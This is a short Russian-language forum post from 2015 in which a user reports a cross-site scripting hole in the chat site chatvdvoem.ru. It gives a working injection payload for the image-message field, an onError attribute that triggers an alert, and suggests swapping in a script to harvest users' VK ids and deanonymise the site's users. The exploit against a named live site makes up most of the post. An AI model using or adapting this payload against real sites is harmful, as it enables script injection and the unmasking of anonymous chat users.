Показать сообщение отдельно

  #7  
Старый 18.08.2015, 18:47
CKahn
Новичок
Регистрация: 18.08.2015
Сообщений: 1
С нами: 5651606

Репутация: 0
По умолчанию

Type:[XSS]

Product: chatvdvoem.ru

Author: CKahn

Exploit: отправить сообщение:

Код:
Image_msg: x" onError="alert('xss')"
В теории можно вставить скрипт для получения id вк и деанонить пользователей сайта

.SpoilerTarget" type="button">Spoiler: image